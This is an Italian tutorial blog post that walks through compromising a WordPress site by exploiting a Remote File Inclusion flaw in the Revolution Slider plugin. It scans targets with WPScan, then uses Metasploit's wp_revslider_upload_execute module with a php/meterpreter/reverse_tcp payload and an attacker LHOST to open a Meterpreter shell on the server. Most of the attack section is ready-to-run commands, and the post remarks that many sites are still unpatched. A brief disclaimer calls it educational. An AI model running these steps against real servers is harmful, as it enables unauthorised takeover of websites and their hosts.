fbpx

Bucare un web server con Metasploit Framework

N.B.: Tutte le informazioni contenute nel seguente articolo sono a scopo esclusivamente didattico, pertanto l’autore non si riterrà responsabile dell’abuso di tali informazioni da parte degli utenti del sito, qualora esse venissero utilizzate per scopi illegali.

In questo capitolo della guida su Metasploit Framework, sfruttiamo una vulnerabilità di Revolution Slider, un noto plugin per WordPress, per effettuare l’upload di un payload che aprirà una sessione di Meterpreter sul server che ospita il sito, garantendo all’attaccante il pieno controllo sulla macchina bersaglio.

Revolution Slider è uno dei plugin per creare slider di immagini su WordPress più comunemente usati e, nelle versioni precedenti alla 3.0.96, presenta una falla chiamata RFI (Remote File Inclusion) che permette a chiunque, anche agli utenti non registrati, l’inclusione di file da remoto. Sebbene nelle versioni più recenti, la falla sia stata riparata, ancora molti siti presentano versioni non aggiornate del plugin, inoltre è un’ottima occasione per dimostrare come sfruttare questo tipo di vulnerabilità con Metasploit.

Il sito vulnerabile

Prima di ogni cosa, dobbiamo accertarci che il sito che intendiamo attaccare presenti la vulnerabilità descritta sopra. Per farlo, utilizziamo WPScan, un software incluso in Kali Linux, descritto in uno degli articoli precedenti.

Avviamo WPScan per analizzare il sito in questione elencando i plugin vulnerabili con il seguente comando

  1. wpscan -u [url_sito] -e vp

Dall’output di questo comando, possiamo chiaramente notare che RevSlider è presente e benché non riusciamo a capire quale versione sia installata, vale la pena tentare l’attacco.

Exploit web server - WPScan

Sfruttare RFI su WordPress e RevSlider con Metasploit

Partiamo avviando Metasploit in modalità MSFconsole con i soliti comandi

  1. service postgresql start
  2. msfconsole

Avviato Metasploit, cerchiamo l’exploit che ci interessa e iniziamo ad utilizzarlo, digitando

  1. search revslider
  2. use exploit/unix/webapp/wp_revslider_upload_execute

Exploit web server - Selezionare exploit

Vediamo le opzioni di configurazione dell’exploit e tutti i payload compatibili con esso

  1. show options
  2. show payloads

Per questo tutorial ho scelto di utilizzare il payload php/meterpreter/reverse_tcp. Configuriamo l’exploit per l’attacco

  1. set RHOST [indirizzo_ip_server_bersaglio]
  2. set VHOST [url_sito_bersaglio]
  3. set PAYLOAD php/meterpreter/reverse_tcp
  4. set LHOST [indirizzo_ip_attacker]

Exploit web server - Configurare exploit

Lanciamo l’attacco con il comando run o exploit, dopo pochi secondi si aprirà una sessione di Meterpreter sul server che ospita il sito.

Exploit web server - Lanciare attacco

Grazie a Baty’s Base per l’Articolo!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *